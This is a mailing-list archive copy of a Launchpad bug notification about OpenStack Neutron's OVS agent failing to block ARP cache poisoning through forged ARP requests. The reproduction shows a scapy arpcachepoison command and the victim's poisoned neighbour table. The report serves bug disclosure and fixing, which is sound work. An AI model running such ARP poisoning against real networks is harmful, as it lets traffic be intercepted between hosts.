yahoo-eng-team team mailing list archive
-
yahoo-eng-team team
-
Mailing list archive
-
Message #35673
[Bug 1456333] Re: ovs-agent: doesn't prevent arp requests with faked ips
** Also affects: neutron/kilo
Importance: Undecided
Status: New
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1456333
Title:
ovs-agent: doesn't prevent arp requests with faked ips
Status in neutron:
Fix Released
Status in neutron kilo series:
New
Bug description:
Patch
https://git.openstack.org/cgit/openstack/neutron/commit/?id=aa7356b729f9672855980429677c969b6bab61a1
setup rules on br-int to prevent faking the IP address in ARP replies.
But it's also possible to poison a neighbour's ARP cache with a bogus
ARP request, as the victim updates its cache on receipt of it. That is
how arpcachepoison in scapy works.
Here the attacker is 10.0.1.6 and the victim is 10.0.1.7
victim# ip n
10.0.1.6 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE
10.0.1.1 dev tapfccaf7c3-01 lladdr fa:16:3e:10:d3:b2 STALE
attacker# scapy
INFO: Can't import python gnuplot wrapper . Won't be able to plot.
INFO: Can't import PyX. Won't be able to use psdump() or pdfdump().
WARNING: No route found for IPv6 destination :: (no default route?)
Welcome to Scapy (2.2.0)
>>> arpcachepoison("10.0.1.7", "10.0.1.1", interval=1)
victim# ip n
10.0.1.6 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE
10.0.1.1 dev tapfccaf7c3-01 lladdr fa:16:3e:33:58:4e STALE
This is at the same level as
https://bugs.launchpad.net/neutron/+bug/1274034, which was deemed not
to be a security vulnerability.
To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1456333/+subscriptions
References